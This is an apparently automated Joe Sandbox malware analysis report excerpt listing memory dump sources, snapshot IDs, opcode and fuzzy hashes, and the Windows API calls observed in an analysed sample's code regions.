                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ContextCryptRelease
                                            • String ID:
                                            • API String ID: 829835001-0
                                            • Opcode ID: d7f67b813982205a91272535380c6c8a4701adc0bafde8696766c44940f7c9fa
                                            • Instruction ID: 683e60d044b7766bfec9570d539cc7b976183d7bc261bac6413c331acd7573f8
                                            • Opcode Fuzzy Hash: d7f67b813982205a91272535380c6c8a4701adc0bafde8696766c44940f7c9fa
                                            • Instruction Fuzzy Hash: C9B012F0A5410066CD30E6150D8DB0C280A530138CF8808143112145C14695D0108414
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2643796409.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5260000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8d4922c62993c24b899fdd485cc3ac8c24237fef4ceff4b73e5e527632128f8a
                                            • Instruction ID: 1adf0adeab2fcbcf4f471619cf0b2740663c2b8bbfbe000ba4f7708c037aeff0
                                            • Opcode Fuzzy Hash: 8d4922c62993c24b899fdd485cc3ac8c24237fef4ceff4b73e5e527632128f8a
                                            • Instruction Fuzzy Hash: 6D5102B8D10348DFDB14CFA9D885BADBBF1BF49304F20902AE819AB290D7749885CF45
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2643796409.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5260000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 659583a620afe7838e2c6e9b3d737fd517f1e54e1b018d13191293ee112014d9
                                            • Instruction ID: a361019ff9615157c844ed3aa36e3230a5904f45f545c80eb90d90027018e84e
                                            • Opcode Fuzzy Hash: 659583a620afe7838e2c6e9b3d737fd517f1e54e1b018d13191293ee112014d9
                                            • Instruction Fuzzy Hash: 2541EFB8D10249DFDB14CFA9D885BADBBF1BF49304F209129E819AB290D774A885CF45
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2643796409.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5260000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: df684e16fe816f71fb4cd98df95af1b07da30cc3419850560e5da1073c71f601
                                            • Instruction ID: de8526cb348984ed2aa941560b3146e5352d6c74dab52f3e75fe5b365b03e372
                                            • Opcode Fuzzy Hash: df684e16fe816f71fb4cd98df95af1b07da30cc3419850560e5da1073c71f601
                                            • Instruction Fuzzy Hash: 7731C875D41208AFDB04DFA8D880AEEBBB5FF49310F109465E515B7360DB74AA04CF95
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2643796409.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5260000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 14e51abed68fa349f5225348462301e37a413d79e0f0b462720d704c0fa4b801
                                            • Instruction ID: 65d565ff8e2836355f2c10a36893ef7ed13655ea70cca43001d460a12766eba4
                                            • Opcode Fuzzy Hash: 14e51abed68fa349f5225348462301e37a413d79e0f0b462720d704c0fa4b801
                                            • Instruction Fuzzy Hash: 6131C875D412089FDB04CFA8D880AEEBBB5FF49310F109465E515B7360DB74AA04CF95
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2643796409.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5260000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 818eed7e3b08ab4cf231277603b99c887c1b8124136642f5e01b4fe4060750cc
                                            • Instruction ID: 7314de94b1f9992da89a480b0a5660c029fffa7a6fe72a36f953c0ac3f362d40
                                            • Opcode Fuzzy Hash: 818eed7e3b08ab4cf231277603b99c887c1b8124136642f5e01b4fe4060750cc
                                            • Instruction Fuzzy Hash: A621AAB4D152088FCB10CFA9D984AEEBBF5AB49310F24901AE818B3210C775A945CFA5
                                            APIs
                                            • operator+.LIBCMT ref: 689B6FCC
                                              • Part of subcall function 689B4147: DName::DName.LIBCMT ref: 689B415A
                                              • Part of subcall function 689B4147: DName::operator+.LIBCMT ref: 689B4161
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: NameName::Name::operator+operator+
                                            • String ID:
                                            • API String ID: 2937105810-0
                                            • Opcode ID: d898ba850483bb4d7660ed094b6d73aea0a44dfd801db71f8ebcd1606a205d82
                                            • Instruction ID: d3f1d8143f5836f4eb937aa2504d20f1a45e5b56aab0b13edd416be01f47bf62
                                            • Opcode Fuzzy Hash: d898ba850483bb4d7660ed094b6d73aea0a44dfd801db71f8ebcd1606a205d82
                                            • Instruction Fuzzy Hash: 55D12E75900209AFDF01DFA8C885AFFBBF8EF19318F80415AE515AB290DB34DA45DB60
                                            APIs
                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,689AA2D4,689D95C0,00000008,689AA468,?,?,?,689D95E0,0000000C,689AA523,?), ref: 689AECA5
                                            • __mtterm.LIBCMT ref: 689AECB1
                                              • Part of subcall function 689AE97C: DecodePointer.KERNEL32(00000012,689AA397,689AA37D,689D95C0,00000008,689AA468,?,?,?,689D95E0,0000000C,689AA523,?), ref: 689AE98D
                                              • Part of subcall function 689AE97C: TlsFree.KERNEL32(0000000C,689AA397,689AA37D,689D95C0,00000008,689AA468,?,?,?,689D95E0,0000000C,689AA523,?), ref: 689AE9A7
                                              • Part of subcall function 689AE97C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,689AA397,689AA37D,689D95C0,00000008,689AA468,?,?,?,689D95E0,0000000C,689AA523,?), ref: 689B2325
                                              • Part of subcall function 689AE97C: DeleteCriticalSection.KERNEL32(0000000C,?,?,689AA397,689AA37D,689D95C0,00000008,689AA468,?,?,?,689D95E0,0000000C,689AA523,?), ref: 689B234F
                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 689AECC7
                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 689AECD4
                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 689AECE1
                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 689AECEE
                                            • TlsAlloc.KERNEL32(?,?,689AA2D4,689D95C0,00000008,689AA468,?,?,?,689D95E0,0000000C,689AA523,?), ref: 689AED3E
                                            • TlsSetValue.KERNEL32(00000000,?,?,689AA2D4,689D95C0,00000008,689AA468,?,?,?,689D95E0,0000000C,689AA523,?), ref: 689AED59
                                            • __init_pointers.LIBCMT ref: 689AED63
                                            • EncodePointer.KERNEL32(?,?,689AA2D4,689D95C0,00000008,689AA468,?,?,?,689D95E0,0000000C,689AA523,?), ref: 689AED74
                                            • EncodePointer.KERNEL32(?,?,689AA2D4,689D95C0,00000008,689AA468,?,?,?,689D95E0,0000000C,689AA523,?), ref: 689AED81
                                            • EncodePointer.KERNEL32(?,?,689AA2D4,689D95C0,00000008,689AA468,?,?,?,689D95E0,0000000C,689AA523,?), ref: 689AED8E
                                            • EncodePointer.KERNEL32(?,?,689AA2D4,689D95C0,00000008,689AA468,?,?,?,689D95E0,0000000C,689AA523,?), ref: 689AED9B
                                            • DecodePointer.KERNEL32(Function_0006EB00,?,?,689AA2D4,689D95C0,00000008,689AA468,?,?,?,689D95E0,0000000C,689AA523,?), ref: 689AEDBC
                                            • __calloc_crt.LIBCMT ref: 689AEDD1
                                            • DecodePointer.KERNEL32(00000000,?,?,689AA2D4,689D95C0,00000008,689AA468,?,?,?,689D95E0,0000000C,689AA523,?), ref: 689AEDEB
                                            • GetCurrentThreadId.KERNEL32 ref: 689AEDFD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                            • API String ID: 1868149495-3819984048
                                            • Opcode ID: 0a5c550a2dda79c5d83a921f3dcaa111bce5985441555de419ee6adbf75ffe7b
                                            • Instruction ID: 52fec8c3d652fb052107397758346dc23d04f45b3118d9243f8b3e7c32ad4ec3
                                            • Opcode Fuzzy Hash: 0a5c550a2dda79c5d83a921f3dcaa111bce5985441555de419ee6adbf75ffe7b
                                            • Instruction Fuzzy Hash: F7316D319583149EDF10EF75AC0C62E3FA8BF9666C794152AE4B093290DB31D441DF91
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: _memmove$Xinvalid_argumentstd::_
                                            • String ID: invalid string position$string too long
                                            • API String ID: 1771113911-4289949731
                                            • Opcode ID: f2e71c86196b5ff6e48f641fb4a96dc3c604eee5505296d2efd49db45e71d23b
                                            • Instruction ID: a44efa4f03ce8a7bcefd2b24771101e554ad534f8666130fe561b0d287016f89
                                            • Opcode Fuzzy Hash: f2e71c86196b5ff6e48f641fb4a96dc3c604eee5505296d2efd49db45e71d23b
                                            • Instruction Fuzzy Hash: 76B16F71740145ABDB28CE1CDC91A6E73A6EF86748B94491DF892CB741C734EC62CBA3
                                            APIs
                                            • UnDecorator::getBasicDataType.LIBCMT ref: 689B7FFF
                                            • DName::operator=.LIBCMT ref: 689B8013
                                            • DName::operator+=.LIBCMT ref: 689B8021
                                            • UnDecorator::getPtrRefType.LIBCMT ref: 689B804D
                                            • UnDecorator::getDataIndirectType.LIBCMT ref: 689B80CA
                                            • UnDecorator::getBasicDataType.LIBCMT ref: 689B80D3
                                            • operator+.LIBCMT ref: 689B8166
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Decorator::getType$Data$Basic$IndirectName::operator+=Name::operator=operator+
                                            • String ID: std::nullptr_t$volatile
                                            • API String ID: 2203807771-3726895890
                                            • Opcode ID: 85b96fb6b3e6af104612e2f2380e00b305d33d00a4fa43b3ab3026e2a5c425dd
                                            • Instruction ID: fcbcefbce5835184495b08577e52845d279e9bee1fe2e8b424db8ddfb51f7dd9
                                            • Opcode Fuzzy Hash: 85b96fb6b3e6af104612e2f2380e00b305d33d00a4fa43b3ab3026e2a5c425dd
                                            • Instruction Fuzzy Hash: 4F41ACB55A810ABFCB14CFA4C8849EFBF78FF1A3C9FC08169E96566100C731D6428B51
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 68965177
                                              • Part of subcall function 68972820: _malloc.LIBCMT ref: 68972871
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000004), ref: 689651B9
                                            • SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 689651D5
                                            • SafeArrayAccessData.OLEAUT32(00000000,00000000), ref: 689651E5
                                            • _memmove.LIBCMT ref: 689651FF
                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 68965208
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6896522C
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 68965263
                                            • VariantClear.OLEAUT32(?), ref: 6896526C
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 689652AD
                                            • VariantClear.OLEAUT32(?), ref: 689652B6
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000002,00000002), ref: 689652D2
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6896534E
                                            • VariantClear.OLEAUT32(?), ref: 68965358
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$ElementVariant$Clear$CreateDataVector$AccessDestroyInitUnaccess_malloc_memmove
                                            • String ID:
                                            • API String ID: 452649785-0
                                            • Opcode ID: 3bd627d47b3bb5466750262c46f841c138c88da1f325ca9c8609e5f156b1de37
                                            • Instruction ID: 0bf9ec15dcee882d41f1b5a28d5ef7caa432685a68f8c100488fd9f31c21dc77
                                            • Opcode Fuzzy Hash: 3bd627d47b3bb5466750262c46f841c138c88da1f325ca9c8609e5f156b1de37
                                            • Instruction Fuzzy Hash: 6E7119B5A0021AEFEB00CFA5C884EAFBBB8FF59714F408119E9159B241D775E945CBA0
                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6895FA0F
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6895FA22
                                            • SafeArrayGetElement.OLEAUT32 ref: 6895FA5A
                                              • Part of subcall function 68963A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 68963B71
                                              • Part of subcall function 68963A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 68963B83
                                              • Part of subcall function 689669C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 68966A08
                                              • Part of subcall function 689669C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 68966A15
                                              • Part of subcall function 689669C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 68966A41
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 689623FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896240F
                                              • Part of subcall function 6895DFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6895DFF6
                                              • Part of subcall function 6895DFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6895E003
                                              • Part of subcall function 6895DFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6895E02F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Bound$Destroy$Element
                                            • String ID: RS7m$RS{m
                                            • API String ID: 959723449-144615663
                                            • Opcode ID: fbe5b340ad0e455916e98f702962ff35415a7f67b76f65e92d3026cf3bb48277
                                            • Instruction ID: 46a8828018e52e06a912b27150901dabfaeda8a29a3c93185b2456ea9aa1a3fa
                                            • Opcode Fuzzy Hash: fbe5b340ad0e455916e98f702962ff35415a7f67b76f65e92d3026cf3bb48277
                                            • Instruction Fuzzy Hash: 64C15074A002059FEB10DFA8CC80FADB7BDAF89318F904199E955EB286D771ED80CB51
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$Init$Clear$Copy
                                            • String ID:
                                            • API String ID: 3833040332-0
                                            • Opcode ID: 2017be765c56946f18f3ad7cebab781692cc2c87c329cb51008ce4e2e5688696
                                            • Instruction ID: 160a457062358a5042e2d49300b9abdcdbe2ddd7369cb99147b3e30a52bf5835
                                            • Opcode Fuzzy Hash: 2017be765c56946f18f3ad7cebab781692cc2c87c329cb51008ce4e2e5688696
                                            • Instruction Fuzzy Hash: D781ACB1A00219AFDB04DFA8C884FEEBBB9FF49318F54415DE515AB240DB35E945CBA0
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6896D8EC
                                            • VariantInit.OLEAUT32 ref: 6896D902
                                            • VariantInit.OLEAUT32(?), ref: 6896D90D
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6896D929
                                            • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6896D966
                                            • VariantClear.OLEAUT32(?), ref: 6896D973
                                            • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6896D9B4
                                            • VariantClear.OLEAUT32(?), ref: 6896D9C1
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896DA6F
                                            • VariantClear.OLEAUT32(?), ref: 6896DA80
                                            • VariantClear.OLEAUT32(?), ref: 6896DA87
                                            • VariantClear.OLEAUT32(?), ref: 6896DA99
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
                                            • String ID:
                                            • API String ID: 1625659656-0
                                            • Opcode ID: bd1cfbff10424352efeef8ee4fbbe2bf3bb692b4f2db18ee1ecd6c3411a54f3d
                                            • Instruction ID: 074bd64f8e40ba53dd6355d3f327696e7bdd131deb86b719981b2a005c2221c6
                                            • Opcode Fuzzy Hash: bd1cfbff10424352efeef8ee4fbbe2bf3bb692b4f2db18ee1ecd6c3411a54f3d
                                            • Instruction Fuzzy Hash: 568135762083019FD710CF68C884B5ABBE8FFD9724F148A5DE9A49B340E735E945CB92
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Xinvalid_argumentstd::_$_memmove
                                            • String ID: invalid string position$string too long
                                            • API String ID: 2168136238-4289949731
                                            • Opcode ID: f0a18cab4314490ccaa43067e97fa5d8848d085afbd12ab1cfa09f5444af4287
